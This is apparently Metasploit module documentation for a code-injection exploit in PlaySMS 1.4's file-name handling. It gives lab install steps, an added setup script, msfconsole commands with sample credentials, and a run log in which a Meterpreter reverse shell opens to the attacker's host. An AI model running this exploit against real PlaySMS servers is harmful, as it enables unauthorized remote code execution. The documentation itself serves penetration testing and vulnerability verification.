Description
This module exploits a code injection vulnerability in an authenticated file upload feature of PlaySMS v1.4. The issue is caused by improper handling of the uploaded file name in sendfromfile.php: an authenticated user can upload a file and rename it so that the file name carries a malicious payload, which the application then executes. Additional information, and further vulnerabilities in the same release, can be found in Exploit-DB 42044.
Vulnerable Application
The vulnerable release (PlaySMS 1.4) is available at Exploit-DB.
Vulnerable Application Installation Setup
- Download the application:
wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz
- Extract it:
tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz
- Move the web files into the web root:
mv playsms-1.4/web/* /var/www/html/
- Create the config file from the shipped template:
cp /var/www/html/config-dist.php /var/www/html/config.php
- Change the owner to the web server user:
chown -R www-data:www-data /var/www/html/
- Set the database credentials in config.php, and import playsms-1.4/db/playsms.sql into your playsms database.
- Now visit: http://localhost/
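The steps above can be run as one script. The following is an added example, not part of the module documentation or of the PlaySMS project; it performs the download, extraction, config rewrite and database import end to end. It assumes a Debian/Ubuntu layout (web root /var/www/html owned by www-data), a local MySQL/MariaDB whose root password is supplied in MYSQL_ROOT_PW, and that config-dist.php stores its database settings as $core_config['db']['host'|'user'|'pass'|'name'] = '...'; lines (all of these are assumptions, not facts stated on this page).

```shell
#!/bin/sh
# Added example (not from the module documentation): install PlaySMS 1.4 into
# the Apache web root and do the database setup the steps above describe in prose.
# Assumptions (not stated on the page):
#   - Debian/Ubuntu layout: web root /var/www/html, owner www-data
#   - MySQL/MariaDB on localhost, root password exported in MYSQL_ROOT_PW
#   - config-dist.php holds the DB settings as
#     $core_config['db']['host'|'user'|'pass'|'name'] = '...';
set -eu

TARBALL=577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz
SRC_URL="https://www.exploit-db.com/apps/$TARBALL"
WEBROOT=/var/www/html
DB_NAME=${DB_NAME:-playsms}
DB_USER=${DB_USER:-playsms}
DB_PASS=${DB_PASS:-playsms}

# Rewrite one $core_config['db'][<key>] line in a PlaySMS config.php.
# Usage: set_db_value <config.php> <key> <value>
# Writes to a temp file and renames it, so it works with both BSD and GNU sed.
set_db_value() {
    cfg=$1; key=$2; val=$3
    # '.' stands in for the leading '$' so the pattern needs no '$' quoting.
    sed "s|^\(.core_config\['db'\]\['${key}'\] *= *\).*|\1'${val}';|" "$cfg" > "$cfg.tmp"
    mv "$cfg.tmp" "$cfg"
}

# Create the database and a dedicated user, then load the schema shipped in
# the tarball (playsms-1.4/db/playsms.sql).
# CREATE USER IF NOT EXISTS needs MySQL 5.7+ or MariaDB 10.1+.
setup_database() {
    mysql -u root -p"$MYSQL_ROOT_PW" <<SQL
CREATE DATABASE IF NOT EXISTS \`$DB_NAME\`;
CREATE USER IF NOT EXISTS '$DB_USER'@'localhost' IDENTIFIED BY '$DB_PASS';
GRANT ALL PRIVILEGES ON \`$DB_NAME\`.* TO '$DB_USER'@'localhost';
FLUSH PRIVILEGES;
SQL
    mysql -u "$DB_USER" -p"$DB_PASS" "$DB_NAME" < playsms-1.4/db/playsms.sql
}

# The install sequence from the steps above, with the config and DB work filled in.
install_playsms() {
    wget -q "$SRC_URL"
    tar -xf "$TARBALL"
    mv playsms-1.4/web/* "$WEBROOT"/
    cp "$WEBROOT/config-dist.php" "$WEBROOT/config.php"
    for kv in "host localhost" "name $DB_NAME" "user $DB_USER" "pass $DB_PASS"; do
        set -- $kv
        set_db_value "$WEBROOT/config.php" "$1" "$2"
    done
    setup_database
    chown -R www-data:www-data "$WEBROOT"
    echo "PlaySMS installed; browse to http://localhost/"
}

# Only run the installer when explicitly requested, so the file can be sourced
# for its functions without touching the system.
if [ "${PLAYSMS_INSTALL:-0}" = 1 ]; then
    install_playsms
fi
```

Run it as root with `MYSQL_ROOT_PW=... PLAYSMS_INSTALL=1 sh install-playsms.sh`. Keep the default playsms/playsms credentials only in an isolated lab: the same DB user and password are what the application (and anyone who reads config.php after exploitation) will see.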
Verification Steps
- Install the application as described above
- Start msfconsole
- Do:
use exploit/multi/http/playsms_filename_exec
- Do:
set rport <port>
- Do:
set rhost <ip>
- Do:
set targeturi SecreTSMSgatwayLogin
- Do:
set username touhid
- Do:
set password diana
- Do:
check
[*] 10.22.1.10:80 The target appears to be vulnerable.
- Do:
set lport <port>
- Do:
set lhost <ip>
- Do:
exploit
- You should get a shell.
Scenarios
Playsms on Ubuntu Linux
msf exploit(multi/http/playsms_filename_exec) > run
[*] Started reverse TCP handler on 10.22.1.3:4444
[+] X-CSRF-Token for login : 13bce9776cfc270a3779e8b557330cc2
[*] Trying to Login ......
[+] Authentication successful : [ touhid:diana ]
[+] X-CSRF-Token for upload : 2780d48dc11a482a58d8a95ad873c6cc
[*] Trying to upload file with malicious Filename Field....
[*] Sending stage (37775 bytes) to 10.22.1.15
[*] Sleeping before handling stage...
[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.15:38814) at 2018-04-08 13:45:34 +0530
meterpreter >